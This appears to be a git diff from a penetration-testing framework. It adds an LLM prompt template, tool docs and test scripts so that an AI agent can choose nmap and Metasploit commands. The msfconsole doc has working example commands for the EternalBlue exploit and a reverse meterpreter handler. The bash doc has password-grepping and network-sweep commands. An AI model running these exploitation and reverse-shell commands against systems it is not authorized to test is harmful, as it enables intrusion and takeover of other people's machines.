+    "process_management": ["bash"],
+    "log_analysis": ["bash"]
+}
+```
+
+### 2. **Intent-to-Tool Mapping**
+
+```python
+INTENT_MAPPING = {
+    # Network operations - using bash for nmap commands
+    "port_scan": {
+        "primary": ("bash", "execute", {"category": "network"}),
+        "fallback": None
+    },
+    "service_detection": {
+        "primary": ("bash", "execute", {"category": "network"}),
+        "fallback": None
+    },
+    "vulnerability_scan": {
+        "primary": ("bash", "execute", {"category": "network"}),
+        "fallback": None
+    },
+    
+    # Exploitation
+    "exploit_target": {
+        "primary": ("msfconsole", "exploit"),
+        "fallback": ("bash", "execute", {"category": "exploitation"})
+    },
+    "scan_vulnerabilities": {
+        "primary": ("msfconsole", "auxiliary"),
+        "fallback": ("bash", "execute", {"category": "network"})
+    },
+    
+    # General operations
+    "file_search": {
+        "primary": ("bash", "execute", {"category": "file"}),
+        "fallback": None
+    },
+    "process_analysis": {
+        "primary": ("bash", "execute", {"category": "process"}),
+        "fallback": None
+    }
+}
+```
+
+## LLM Prompt Template
+
+### Enhanced Prompt with Tool Awareness
+
+```
+You are a penetration testing assistant. You have access to the following tools:
+
+## Available Tools
+
+### msfconsole (Exploitation Framework)
+**Category:** exploitation  
+**Description:** Metasploit Framework for exploitation and post-exploitation
+**Capabilities:**
+- exploit: Run exploit modules against targets
+  - Parameters: module (required), rhosts (required), lhost (for reverse), rport, payload, options
+- auxiliary: Run auxiliary modules (scanners, fuzzers)
+  - Parameters: module (required), rhosts (required), rport, options
+- search: Search for modules by name/CVE/platform
+  - Parameters: query (required), type (exploit/auxiliary/post)
+
+### bash (Fallback Shell)
+**Category:** fallback
+**Description:** Universal command execution when specialized tools unavailable
+**Capabilities:**
+- execute: Run any shell command
+  - Parameters: command (required), timeout, category (hint)
+- script: Execute custom bash scripts
+  - Parameters: script (required), args
+- tool_combination: Complex command pipelines
+  - Parameters: command (required), description
+
+## Tool Selection Rules
+
+1. **Always prefer specialized tools** over bash when available
+2. **Use bash only as fallback** when:
+   - No specialized tool exists for the task
+   - Need to combine multiple tools with pipes/logic
+   - Performing basic system operations
+
+3. **Tool availability check**: Assume all tools are available unless specified otherwise
+
+## Response Format
+
+For each user request, respond with a JSON array of tool commands:
+
+```json
+[
+  {
+    "tool": "tool_name",
+    "capability": "capability_name", 
+    "parameters": {
+      "param1": "value1",
+      "param2": "value2"
+    },
+    "explanation": "Why this tool/capability was chosen",
+    "priority": 1
+  }
+]
+```
+
+## Examples
+
+**User:** "Scan all ports on 192.168.1.100 and detect services"
+
+**Response:**
+```json
+[
+  {
+    "tool": "bash",
+    "capability": "execute",
+    "parameters": {
+      "command": "nmap -sS -p- 192.168.1.100",
+      "category": "network"
+    },
+    "explanation": "Use nmap via bash for comprehensive port scanning",
+    "priority": 1
+  },
+  {
+    "tool": "bash", 
+    "capability": "execute",
+    "parameters": {
+      "command": "nmap -sV 192.168.1.100",
+      "category": "network"
+    },
+    "explanation": "Detect services on target host using nmap",
+    "priority": 2
+  }
+]
+```
+
+**User:** "Check if target is vulnerable to EternalBlue"
+
+**Response:**
+```json
+[
+  {
+    "tool": "msfconsole",
+    "capability": "auxiliary", 
+    "parameters": {
+      "module": "auxiliary/scanner/smb/smb_ms17_010",
+      "rhosts": "{{TARGET_IP}}"
+    },
+    "explanation": "Use Metasploit auxiliary module to check EternalBlue vulnerability",
+    "priority": 1
+  }
+]
+```
+
+**User:** "Find all configuration files in /etc"
+
+**Response:**
+```json
+[
+  {
+    "tool": "bash",
+    "capability": "execute",
+    "parameters": {
+      "command": "find /etc -name '*.conf' -type f 2>/dev/null",
+      "category": "file"
+    },
+    "explanation": "Use bash for file system operations as no specialized tool needed",
+    "priority": 1
+  }
+]
+```
+
+Now process the user's request and select appropriate tools and capabilities.
+```
+
+## Implementation in Command Generation API
+
+### Modified Command Generation Workflow
+
+```python
+# wish-command-generation-api integration
+class ToolAwareCommandGenerator:
+    def __init__(self):
+        self.tool_registry = tool_registry
+        self.intent_mapper = IntentMapper()
+        
+    async def generate_commands(self, query: str, context: dict) -> List[dict]:
+        """Generate commands using tool framework."""
+        
+        # 1. Get available tools
+        available_tools = self._get_available_tools()
+        
+        # 2. Create enhanced prompt with tool metadata
+        prompt = self._create_tool_aware_prompt(available_tools, query, context)
+        
+        # 3. Get LLM response with tool selections
+        llm_response = await self._call_llm(prompt)
+        
+        # 4. Parse and validate tool selections
+        tool_commands = self._parse_tool_selections(llm_response)
+        
+        # 5. Generate actual commands using tool framework
+        commands = []
+        for tool_cmd in tool_commands:
+            try:
+                tool = self.tool_registry.get_tool(tool_cmd["tool"])
+                command_input = tool.generate_command(
+                    capability=tool_cmd["capability"],
+                    parameters=tool_cmd["parameters"]
+                )
+                
+                commands.append({
+                    "command": command_input.command,
+                    "timeout_sec": command_input.timeout_sec,
+                    "tool": tool_cmd["tool"],
+                    "capability": tool_cmd["capability"],
+                    "explanation": tool_cmd.get("explanation", ""),
+                    "metadata": {
+                        "tool_metadata": tool.metadata.dict(),
+                        "parameters": tool_cmd["parameters"]
+                    }
+                })
+            except Exception as e:
+                # Fallback to bash if tool command generation fails
+                commands.append({
+                    "command": f"# Error generating command: {e}",
+                    "timeout_sec": 300,
+                    "tool": "bash",
+                    "capability": "execute",
+                    "explanation": f"Fallback due to error: {e}"
+                })
+        
+        return commands
+    
+    def _get_available_tools(self) -> dict:
+        """Get metadata for all available tools."""
+        tools_metadata = {}
+        for tool_metadata in self.tool_registry.list_tools():
+            tools_metadata[tool_metadata.name] = {
+                "description": tool_metadata.description,
+                "category": tool_metadata.category,
+                "capabilities": [
+                    {
+                        "name": cap.name,
+                        "description": cap.description,
+                        "parameters": cap.parameters,
+                        "examples": cap.examples[:2]  # Limit examples for prompt size
+                    }
+                    for cap in tool_metadata.capabilities
+                ],
+                "requirements": tool_metadata.requirements,
+                "tags": tool_metadata.tags
+            }
+        return tools_metadata
+    
+    def _create_tool_aware_prompt(self, tools: dict, query: str, context: dict) -> str:
+        """Create enhanced prompt with tool information."""
+        # Build tool descriptions
+        tool_descriptions = []
+        for tool_name, tool_info in tools.items():
+            desc = f"### {tool_name} ({tool_info['category'].title()})\n"
+            desc += f"**Description:** {tool_info['description']}\n"
+            desc += "**Capabilities:**\n"
+            
+            for cap in tool_info['capabilities']:
+                desc += f"- {cap['name']}: {cap['description']}\n"
+                if cap['parameters']:
+                    desc += f"  - Parameters: {', '.join(cap['parameters'].keys())}\n"
+            
+            tool_descriptions.append(desc)
+        
+        # Build context information
+        context_info = []
+        if context.get('target_host'):
+            context_info.append(f"Target Host: {context['target_host']}")
+        if context.get('current_directory'):
+            context_info.append(f"Current Directory: {context['current_directory']}")
+        
+        prompt = f"""You are a penetration testing assistant with access to specialized tools.
+
+## Available Tools
+
+{chr(10).join(tool_descriptions)}
+
+## Current Context
+{chr(10).join(context_info) if context_info else "No specific context provided"}
+
+## Tool Selection Rules
+1. Always prefer specialized tools over bash when available
+2. Use bash only as fallback when no specialized tool exists
+3. Consider tool availability and context
+
+## User Request
+{query}
+
+Respond with a JSON array of tool commands using the format specified above.
+"""
+        return prompt
+```
+
+## Migration Strategy
+
+### Phase 1: Parallel Implementation
+- Keep existing command generation working
+- Add new tool-aware endpoint alongside existing one
+- Test with subset of queries
+
+### Phase 2: Gradual Migration  
+- Route specific query types to tool-aware generator
+- Fallback to legacy generator if tool-aware fails
+- Monitor success rates and performance
+
+### Phase 3: Full Replacement
+- Replace legacy generator with tool-aware version
+- Remove fallback mechanisms
+- Optimize for performance
+
+## Benefits
+
+1. **Better Tool Utilization**: LLM chooses optimal tools for each task
+2. **Structured Output**: Tools provide metadata and structured results
+3. **Safety**: Tool validation prevents dangerous commands
+4. **Maintainability**: Adding new tools automatically improves LLM capabilities
+5. **Fallback Robustness**: Bash ensures commands can always be generated
+
+## Testing Strategy
+
+### Unit Tests
+```python
+def test_tool_selection():
+    generator = ToolAwareCommandGenerator()
+    
+    # Test port scanning uses bash for nmap commands
+    commands = await generator.generate_commands(
+        "scan ports on 192.168.1.1", 
+        {"target_host": "192.168.1.1"}
+    )
+    
+    assert commands[0]["tool"] == "bash"
+    assert commands[0]["capability"] == "execute"
+    assert "nmap" in commands[0]["command"]
+    
+def test_msfconsole_selection():
+    generator = ToolAwareCommandGenerator()
+    
+    commands = await generator.generate_commands(
+        "exploit target with EternalBlue",
+        {"target_host": "192.168.1.1"}
+    )
+    
+    assert commands[0]["tool"] == "msfconsole"
+    assert commands[0]["capability"] == "exploit"
+```
+
+### Integration Tests
+- Test with real LLM API calls
+- Verify command generation for various scenarios
+- Test fallback mechanisms
+- Performance benchmarking
+
+This integration maintains backward compatibility while leveraging the full power of the tool framework.
\ No newline at end of file
diff --git a/wish-tools/docs/tools/bash.md b/wish-tools/docs/tools/bash.md
new file mode 100644
index 0000000..2f8fc7b
--- /dev/null
+++ b/wish-tools/docs/tools/bash.md
@@ -0,0 +1,99 @@
+# bash
+
+Fallback shell command execution when no specialized tool is available
+
+**Version:** 1.0.0
+**Author:** Wish Framework Team
+**Category:** fallback
+**Tags:** shell, fallback, general-purpose, universal
+
+## Requirements
+- bash
+
+## Capabilities
+
+### execute
+Execute any bash command (used when specialized tools are unavailable)
+
+**Parameters:**
+- `command`: The bash command to execute
+- `timeout`: Timeout in seconds (optional, default: 300)
+- `category`: Command category hint (optional: network, file, process, system, web, text)
+
+**Examples:**
+```bash
+# Network enumeration fallback
+```
+```bash
+nc -zv 192.168.1.1 22-443
+```
+```bash
+ping -c 4 8.8.8.8
+```
+```bash
+# File operations fallback
+```
+```bash
+find /etc -name '*.conf' -type f
+```
+```bash
+grep -r 'password' /var/log/
+```
+```bash
+# Process management fallback
+```
+```bash
+ps aux | grep nginx
+```
+```bash
+netstat -tulpn | grep :80
+```
+```bash
+# System information fallback
+```
+```bash
+uname -a && cat /etc/os-release
+```
+```bash
+df -h && free -h
+```
+
+### script
+Execute custom bash scripts for complex operations
+
+**Parameters:**
+- `script`: The bash script content
+- `args`: Script arguments (optional)
+
+**Examples:**
+```bash
+#!/bin/bash
+# Custom enumeration script
+for port in 22 80 443; do nc -zv $1 $port; done
+```
+```bash
+#!/bin/bash
+# Log analysis script
+grep 'ERROR' /var/log/*.log | tail -20
+```
+
+### tool_combination
+Combine multiple tools with pipes and logic when no single specialized tool exists
+
+**Parameters:**
+- `command`: Complex command combining multiple tools
+- `description`: Description of what the combined command does
+
+**Examples:**
+```bash
+# Network discovery + service detection
+```
+```bash
+nmap -sn 192.168.1.0/24 | grep 'Nmap scan report' | awk '{print $5}' | xargs -I {} nmap -sV -p 22,80,443 {}
+```
+```bash
+# Log analysis with multiple filters
+```
+```bash
+cat /var/log/auth.log | grep 'Failed password' | awk '{print $11}' | sort | uniq -c | sort -nr
+```
\ No newline at end of file
diff --git a/wish-tools/docs/tools/index.md b/wish-tools/docs/tools/index.md
new file mode 100644
index 0000000..65e78ed
--- /dev/null
+++ b/wish-tools/docs/tools/index.md
@@ -0,0 +1,87 @@
+# Wish Tools Documentation
+
+This directory contains automatically generated documentation for all available tools
+in the wish-tools framework.
+
+**Total Tools:** 2
+**Categories:** 2
+
+## Tools by Category
+
+### Exploitation
+
+- **[msfconsole](msfconsole.md)** - Metasploit Framework penetration testing tool
+
+### Fallback
+
+- **[bash](bash.md)** - Fallback shell command execution when no specialized tool is available
+
+## Quick Reference
+
+| Tool | Category | Description | Requirements |
+|------|----------|-------------|--------------|
+| [bash](bash.md) | fallback | Fallback shell command execution when no specialized tool is available | bash |
+| [msfconsole](msfconsole.md) | exploitation | Metasploit Framework penetration testing tool | metasploit-framework |
+
+## Usage Examples
+
+### Basic Tool Usage
+
+```python
+from wish_tools.framework.registry import tool_registry
+from wish_tools.framework.base import ToolContext, CommandInput
+
+# Get a tool
+tool = tool_registry.get_tool('bash')
+
+# Create context
+context = ToolContext(
+    working_directory='/tmp',
+    run_id='example'
+)
+
+# Execute command
+command = CommandInput(command='echo hello', timeout_sec=30)
+result = await tool.execute(command, context)
+
+print(result.output)
+```
+
+### Generate Command from Capability
+
+```python
+# Generate command using tool capabilities
+tool = tool_registry.get_tool('bash')
+command = tool.generate_command(
+    capability='execute',
+    parameters={
+        'command': 'nmap -sS -p 22,80,443 192.168.1.0/24',
+        'category': 'network'
+    }
+)
+
+print(command.command)  # nmap -sS -p 22,80,443 192.168.1.0/24
+```
+
+### Tool Testing
+
+```python
+from wish_tools.framework.testing import ToolTester, TestCase
+
+# Create tester
+tool = tool_registry.get_tool('bash')
+tester = ToolTester(tool)
+
+# Run availability test
+result = await tester.test_availability()
+print(f'Tool available: {result.passed}')
+
+# Generate test report
+results = await tester.run_test_suite(test_cases)
+report = tester.generate_report(results)
+print(report)
+```
+
+---
+
+*Documentation generated automatically by wish-tools framework*
\ No newline at end of file
diff --git a/wish-tools/docs/tools/msfconsole.md b/wish-tools/docs/tools/msfconsole.md
new file mode 100644
index 0000000..7570240
--- /dev/null
+++ b/wish-tools/docs/tools/msfconsole.md
@@ -0,0 +1,82 @@
+# msfconsole
+
+Metasploit Framework penetration testing tool
+
+**Version:** 1.0.0
+**Author:** Wish Framework Team
+**Category:** exploitation
+**Tags:** exploitation, pentesting, vulnerability, msf, metasploit
+
+## Requirements
+- metasploit-framework
+
+## Capabilities
+
+### exploit
+Run an exploit module against target(s)
+
+**Parameters:**
+- `module`: The exploit module path (e.g., exploit/windows/smb/ms17_010_eternalblue)
+- `rhosts`: Target host(s) - IP address or range
+- `rport`: Target port (optional, module default used if not specified)
+- `payload`: Payload to use (optional, module default used if not specified)
+- `lhost`: Local host for reverse connection (required for reverse payloads)
+- `lport`: Local port for reverse connection (optional, default: 4444)
+- `options`: Additional module options as key-value pairs (optional)
+
+**Examples:**
+```bash
+use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.100; set LHOST 192.168.1.10; exploit
+```
+```bash
+use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.10; exploit
+```
+
+### auxiliary
+Run an auxiliary module (scanners, fuzzers, etc.)
+
+**Parameters:**
+- `module`: The auxiliary module path (e.g., auxiliary/scanner/smb/smb_version)
+- `rhosts`: Target host(s) - IP address or range
+- `rport`: Target port (optional)
+- `options`: Additional module options as key-value pairs (optional)
+
+**Examples:**
+```bash
+use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run
+```
+```bash
+use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.100; set PORTS 1-1000; run
+```
+
+### search
+Search for modules by name, platform, or CVE
+
+**Parameters:**
+- `query`: Search query (module name, CVE, platform, etc.)
+- `type`: Module type filter (optional: exploit, auxiliary, post, payload)
+
+**Examples:**
+```bash
+search type:exploit platform:windows smb
+```
+```bash
+search cve:2017-0144
+```
+```bash
+search apache struts
+```
+
+### info
+Get detailed information about a module
+
+**Parameters:**
+- `module`: Full module path to get information about
+
+**Examples:**
+```bash
+info exploit/windows/smb/ms17_010_eternalblue
+```
+```bash
+info auxiliary/scanner/smb/smb_version
+```
\ No newline at end of file
diff --git a/wish-tools/pyproject.toml b/wish-tools/pyproject.toml
index d09b685..6dd30b0 100644
--- a/wish-tools/pyproject.toml
+++ b/wish-tools/pyproject.toml
@@ -21,6 +21,7 @@ dev-dependencies = [
     "pytest>=8.3.4",
     "ruff>=0.9.8",
     "graphviz>=0.20.1",
+    "pre-commit>=3.6.0",
 ]
 
 [tool.pdm.build]
diff --git a/wish-tools/scripts/generate_tool_docs.py b/wish-tools/scripts/generate_tool_docs.py
new file mode 100644
index 0000000..14574e3
--- /dev/null
+++ b/wish-tools/scripts/generate_tool_docs.py
@@ -0,0 +1,282 @@
+#!/usr/bin/env python3
+"""
+Tool documentation generator for wish-tools.
+
+This script automatically generates documentation for all available tools
+in the wish-tools framework.
+"""
+
+import argparse
+import sys
+from pathlib import Path
+
+# Add src to path for imports
+sys.path.insert(0, str(Path(__file__).parent.parent / "src"))
+
+from wish_tools.framework.registry import tool_registry
+
+
+def generate_individual_docs(output_dir: Path):
+    """Generate individual documentation files for each tool."""
+    output_dir.mkdir(parents=True, exist_ok=True)
+
+    tools = tool_registry.list_tools()
+    print(f"Generating documentation for {len(tools)} tools...")
+
+    for tool_metadata in tools:
+        try:
+            # Get tool instance
+            tool = tool_registry.get_tool(tool_metadata.name)
+
+            # Generate documentation
+            docs = tool.get_documentation()
+
+            # Write to file
+            doc_file = output_dir / f"{tool_metadata.name}.md"
+            with open(doc_file, "w") as f:
+                f.write(docs)
+
+            print(f"Generated: {doc_file}")
+
+        except Exception as e:
+            print(f"Error generating docs for {tool_metadata.name}: {e}")
+
+
+def generate_index_docs(output_dir: Path):
+    """Generate an index file listing all available tools."""
+    index_file = output_dir / "index.md"
+
+    tools = tool_registry.list_tools()
+
+    # Group tools by category
+    categories = {}
+    for tool in tools:
+        if tool.category not in categories:
+            categories[tool.category] = []
+        categories[tool.category].append(tool)
+
+    # Generate index content
+    content = [
+        "# Wish Tools Documentation",
+        "",
+        "This directory contains automatically generated documentation for all available tools",
+        "in the wish-tools framework.",
+        "",
+        f"**Total Tools:** {len(tools)}",
+        f"**Categories:** {len(categories)}",
+        "",
+        "## Tools by Category",
+        "",
+    ]
+
+    for category, category_tools in sorted(categories.items()):
+        content.append(f"### {category.title()}")
+        content.append("")
+
+        for tool in sorted(category_tools, key=lambda t: t.name):
+            content.append(f"- **[{tool.name}]({tool.name}.md)** - {tool.description}")
+
+        content.append("")
+
+    # Add quick reference
+    content.extend(
+        [
+            "## Quick Reference",
+            "",
+            "| Tool | Category | Description | Requirements |",
+            "|------|----------|-------------|--------------|",
+        ]
+    )
+
+    for tool in sorted(tools, key=lambda t: t.name):
+        requirements = ", ".join(tool.requirements) if tool.requirements else "None"
+        content.append(f"| [{tool.name}]({tool.name}.md) | {tool.category} | {tool.description} | {requirements} |")
+
+    content.extend(
+        [
+            "",
+            "## Usage Examples",
+            "",
+            "### Basic Tool Usage",
+            "",
+            "```python",
+            "from wish_tools.framework.registry import tool_registry",
+            "from wish_tools.framework.base import ToolContext, CommandInput",
+            "",
+            "# Get a tool",
+            "tool = tool_registry.get_tool('bash')",
+            "",
+            "# Create context",
+            "context = ToolContext(",
+            "    working_directory='/tmp',",
+            "    run_id='example'",
+            ")",
+            "",
+            "# Execute command",
+            "command = CommandInput(command='echo hello', timeout_sec=30)",
+            "result = await tool.execute(command, context)",
+            "",
+            "print(result.output)",
+            "```",
+            "",
+            "### Generate Command from Capability",
+            "",
+            "```python",
+            "# Generate command using tool capabilities",
+            "tool = tool_registry.get_tool('bash')",
+            "command = tool.generate_command(",
+            "    capability='execute',",
+            "    parameters={",
+            "        'command': 'nmap -sS -p 22,80,443 192.168.1.0/24',",
+            "        'category': 'network'",
+            "    }",
+            ")",
+            "",
+            "print(command.command)  # nmap -sS -p 22,80,443 192.168.1.0/24",
+            "```",
+            "",
+            "### Tool Testing",
+            "",
+            "```python",
+            "from wish_tools.framework.testing import ToolTester, TestCase",
+            "",
+            "# Create tester",
+            "tool = tool_registry.get_tool('bash')",
+            "tester = ToolTester(tool)",
+            "",
+            "# Run availability test",
+            "result = await tester.test_availability()",
+            "print(f'Tool available: {result.passed}')",
+            "",
+            "# Generate test report",
+            "results = await tester.run_test_suite(test_cases)",
+            "report = tester.generate_report(results)",
+            "print(report)",
+            "```",
+            "",
+            "---",
+            "",
+            "*Documentation generated automatically by wish-tools framework*",
+        ]
+    )
+
+    with open(index_file, "w") as f:
+        f.write("\n".join(content))
+
+    print(f"Generated index: {index_file}")
+
+
+def generate_capability_matrix(output_dir: Path):
+    """Generate a capability matrix showing what each tool can do."""
+    matrix_file = output_dir / "capability-matrix.md"
+
+    tools = tool_registry.list_tools()
+
+    # Collect all unique capabilities
+    all_capabilities = set()
+    tool_capabilities = {}
+
+    for tool in tools:
+        capabilities = [cap.name for cap in tool.capabilities]
+        tool_capabilities[tool.name] = capabilities
+        all_capabilities.update(capabilities)
+
+    all_capabilities = sorted(all_capabilities)
+
+    content = [
+        "# Tool Capability Matrix",
+        "",
+        "This matrix shows which capabilities are available for each tool.",
+        "",
+        "| Tool | " + " | ".join(all_capabilities) + " |",
+        "|------|" + "|".join("---" for _ in all_capabilities) + "|",
+    ]
+
+    for tool in sorted(tools, key=lambda t: t.name):
+        row = [f"**{tool.name}**"]
+        for capability in all_capabilities:
+            if capability in tool_capabilities[tool.name]:
+                row.append("✅")
+            else:
+                row.append("❌")
+        content.append("| " + " | ".join(row) + " |")
+
+    content.extend(
+        [
+            "",
+            "## Legend",
+            "",
+            "- ✅ = Capability available",
+            "- ❌ = Capability not available",
+            "",
+            "## Capability Descriptions",
+            "",
+        ]
+    )
+
+    # Add capability descriptions
+    capability_descriptions = {}
+    for tool in tools:
+        for cap in tool.capabilities:
+            if cap.name not in capability_descriptions:
+                capability_descriptions[cap.name] = cap.description
+
+    for capability in sorted(capability_descriptions.keys()):
+        content.append(f"- **{capability}**: {capability_descriptions[capability]}")
+
+    with open(matrix_file, "w") as f:
+        f.write("\n".join(content))
+
+    print(f"Generated capability matrix: {matrix_file}")
+
+
+def main():
+    """Main entry point."""
+    parser = argparse.ArgumentParser(description="Generate documentation for wish-tools")
+    parser.add_argument(
+        "--output-dir",
+        type=Path,
+        default=Path(__file__).parent.parent / "docs" / "tools",
+        help="Output directory for documentation",
+    )
+    parser.add_argument("--individual", action="store_true", help="Generate individual tool documentation files")
+    parser.add_argument("--index", action="store_true", help="Generate index documentation")
+    # Capability matrix removed - misleading about bash capabilities
+    # parser.add_argument(
+    #     "--matrix",
+    #     action="store_true",
+    #     help="Generate capability matrix"
+    # )
+
+    args = parser.parse_args()
+
+    # If no specific options, generate all available
+    if not any([args.individual, args.index]):
+        args.individual = True
+        args.index = True
+
+    print(f"Generating documentation in: {args.output_dir}")
+
+    # Auto-discover tools
+    try:
+        tool_registry.auto_discover_tools("wish_tools.tools")
+        print(f"Discovered {len(tool_registry.get_tool_names())} tools")
+    except Exception as e:
+        print(f"Warning: Tool auto-discovery failed: {e}")
+
+    # Generate documentation
+    if args.individual:
+        generate_individual_docs(args.output_dir)
+
+    if args.index:
+        generate_index_docs(args.output_dir)
+
+    # Capability matrix removed - it was misleading about bash capabilities
+    # if args.matrix:
+    #     generate_capability_matrix(args.output_dir)
+
+    print("Documentation generation complete!")
+
+
+if __name__ == "__main__":
+    main()
diff --git a/wish-tools/scripts/test_tools.py b/wish-tools/scripts/test_tools.py
new file mode 100644
index 0000000..462264f
--- /dev/null
+++ b/wish-tools/scripts/test_tools.py
@@ -0,0 +1,280 @@
+#!/usr/bin/env python3
+"""
+Tool testing script for wish-tools.
+
+This script runs comprehensive tests on all available tools
+and generates detailed reports about their functionality.
+"""
+
+import argparse
+import asyncio
+import sys
+from pathlib import Path
+from typing import Any, Dict, List
+
+# Add src to path for imports
+sys.path.insert(0, str(Path(__file__).parent.parent / "src"))
+
+from wish_tools.framework.registry import tool_registry
+from wish_tools.framework.testing import (
+    ExitCodeValidator,
+    OutputValidator,
+    PerformanceValidator,
+    TestCase,
+    ToolTester,
+)
+
+
+def create_bash_test_suite() -> List[TestCase]:
+    """Create test suite for BashTool."""
+    return [
+        TestCase(
+            name="simple_echo",
+            description="Test simple echo command",
+            capability="execute",
+            parameters={"command": "echo 'Hello World'"},
+            expected_success=True,
+            validators=[
+                OutputValidator(contains="Hello World"),
+                ExitCodeValidator(expected=0),
+                PerformanceValidator(max_time=5.0),
+            ],
+        ),
+        TestCase(
+            name="file_listing",
+            description="Test file listing command",
+            capability="execute",
+            parameters={"command": "ls -la"},
+            expected_success=True,
+            validators=[ExitCodeValidator(expected=0), PerformanceValidator(max_time=10.0)],
+        ),
+        TestCase(
+            name="invalid_command",
+            description="Test handling of invalid command",
+            capability="execute",
+            parameters={"command": "nonexistentcommand12345"},
+            expected_success=False,
+            validators=[
+                ExitCodeValidator(expected=127)  # Command not found
+            ],
+        ),
+        TestCase(
+            name="script_execution",
+            description="Test script execution capability",
+            capability="script",
+            parameters={"script": "#!/bin/bash\necho 'Script output'\ndate +%Y", "args": ""},
+            expected_success=True,
+            validators=[OutputValidator(contains="Script output"), ExitCodeValidator(expected=0)],
+        ),
+    ]
+
+
+def create_msfconsole_test_suite() -> List[TestCase]:
+    """Create test suite for MsfconsoleTool."""
+
+    def skip_if_no_msfconsole():
+        """Skip test if msfconsole is not available."""
+        import subprocess
+
+        try:
+            subprocess.run(["msfconsole", "-v"], capture_output=True, timeout=10)
+            return False
+        except (FileNotFoundError, subprocess.TimeoutExpired):
+            return True
+
+    return [
+        TestCase(
+            name="module_search",
+            description="Test module search functionality",
+            capability="search",
+            parameters={"query": "smb", "type": "auxiliary"},
+            expected_success=True,
+            validators=[OutputValidator(contains="auxiliary"), ExitCodeValidator(expected=0)],
+            skip_if=skip_if_no_msfconsole,
+        ),
+        TestCase(
+            name="module_info",
+            description="Test module info retrieval",
+            capability="info",
+            parameters={"module": "auxiliary/scanner/smb/smb_version"},
+            expected_success=True,
+            validators=[OutputValidator(contains="Name:"), ExitCodeValidator(expected=0)],
+            skip_if=skip_if_no_msfconsole,
+        ),
+    ]
+
+
+# NmapTool removed - using bash for nmap commands instead
+
+
+async def test_single_tool(tool_name: str, test_cases: List[TestCase]) -> Dict[str, Any]:
+    """Test a single tool with the provided test cases."""
+    print(f"\n{'=' * 60}")
+    print(f"Testing tool: {tool_name}")
+    print(f"{'=' * 60}")
+
+    try:
+        tool = tool_registry.get_tool(tool_name)
+        tester = ToolTester(tool)
+
+        # Run test suite
+        results = await tester.run_test_suite(test_cases)
+
+        # Generate and print report
+        report = tester.generate_report(results)
+        print(report)
+
+        # Return summary
+        total_tests = len(results)
+        passed_tests = sum(1 for r in results if r.passed)
+
+        return {
+            "tool_name": tool_name,
+            "total_tests": total_tests,
+            "passed_tests": passed_tests,
+            "success_rate": passed_tests / total_tests if total_tests > 0 else 0,
+            "results": results,
+        }
+
+    except Exception as e:
+        print(f"Error testing {tool_name}: {e}")
+        return {"tool_name": tool_name, "total_tests": 0, "passed_tests": 0, "success_rate": 0, "error": str(e)}
+
+
+async def test_all_tools() -> List[Dict[str, Any]]:
+    """Test all available tools."""
+    # Define test suites for each tool
+    test_suites = {"bash": create_bash_test_suite(), "msfconsole": create_msfconsole_test_suite()}
+
+    results = []
+
+    for tool_name, test_cases in test_suites.items():
+        if tool_registry.has_tool(tool_name):
+            result = await test_single_tool(tool_name, test_cases)
+            results.append(result)
+        else:
+            print(f"\nTool {tool_name} not available, skipping tests")
+            results.append(
+                {
+                    "tool_name": tool_name,
+                    "total_tests": 0,
+                    "passed_tests": 0,
+                    "success_rate": 0,
+                    "error": "Tool not available",
+                }
+            )
+
+    return results
+
+
+def print_summary(results: List[Dict[str, Any]]):
+    """Print a summary of all test results."""
+    print(f"\n{'=' * 60}")
+    print("TEST SUMMARY")
+    print(f"{'=' * 60}")
+
+    total_tools = len(results)
+    total_tests = sum(r["total_tests"] for r in results)
+    total_passed = sum(r["passed_tests"] for r in results)
+
+    print(f"Tools tested: {total_tools}")
+    print(f"Total tests: {total_tests}")
+    print(f"Tests passed: {total_passed}")
+    print(f"Overall success rate: {total_passed / total_tests * 100:.1f}%" if total_tests > 0 else "N/A")
+    print()
+
+    # Per-tool summary
+    print("Per-tool results:")
+    print("-" * 60)
+    print(f"{'Tool':<15} {'Tests':<8} {'Passed':<8} {'Success Rate':<12} {'Status'}")
+    print("-" * 60)
+
+    for result in results:
+        status = "✅ PASS" if result["success_rate"] == 1.0 and result["total_tests"] > 0 else "❌ FAIL"
+        if result["total_tests"] == 0:
+            status = "⚠️  SKIP"
+
+        success_rate = f"{result['success_rate'] * 100:.1f}%" if result["total_tests"] > 0 else "N/A"
+
+        print(
+            f"{result['tool_name']:<15} {result['total_tests']:<8} "
+            f"{result['passed_tests']:<8} {success_rate:<12} {status}"
+        )
+
+
+async def main():
+    """Main entry point."""
+    parser = argparse.ArgumentParser(description="Test wish-tools framework")
+    parser.add_argument("--tool", type=str, help="Test only the specified tool")
+    parser.add_argument(
+        "--output-dir",
+        type=Path,
+        default=Path(__file__).parent.parent / "test-reports",
+        help="Directory to save test reports",
+    )
+    parser.add_argument("--save-reports", action="store_true", help="Save detailed test reports to files")
+
+    args = parser.parse_args()
+
+    print("Wish Tools Testing Framework")
+    print("=" * 60)
+
+    # Auto-discover tools
+    try:
+        tool_registry.auto_discover_tools("wish_tools.tools")
+        discovered_tools = tool_registry.get_tool_names()
+        print(f"Discovered tools: {', '.join(discovered_tools)}")
+    except Exception as e:
+        print(f"Warning: Tool auto-discovery failed: {e}")
+        discovered_tools = []
+
+    if not discovered_tools:
+        print("No tools discovered. Exiting.")
+        return
+
+    # Run tests
+    if args.tool:
+        if not tool_registry.has_tool(args.tool):
+            print(f"Tool '{args.tool}' not found")
+            return
+
+        # Test single tool
+        test_suites = {"bash": create_bash_test_suite(), "msfconsole": create_msfconsole_test_suite()}
+
+        if args.tool in test_suites:
+            results = [await test_single_tool(args.tool, test_suites[args.tool])]
+        else:
+            print(f"No test suite defined for tool '{args.tool}'")
+            return
+    else:
+        # Test all tools
+        results = await test_all_tools()
+
+    # Print summary
+    print_summary(results)
+
+    # Save reports if requested
+    if args.save_reports:
+        args.output_dir.mkdir(parents=True, exist_ok=True)
+
+        for result in results:
+            if "results" in result:
+                tool_name = result["tool_name"]
+                report_file = args.output_dir / f"{tool_name}-test-report.md"
+
+                # Get tool and regenerate detailed report
+                try:
+                    tool = tool_registry.get_tool(tool_name)
+                    tester = ToolTester(tool)
+                    detailed_report = tester.generate_report(result["results"])
+
+                    with open(report_file, "w") as f:
+                        f.write(detailed_report)
+
+                    print(f"Saved detailed report: {report_file}")
+                except Exception as e:
+                    print(f"Error saving report for {tool_name}: {e}")
+
+
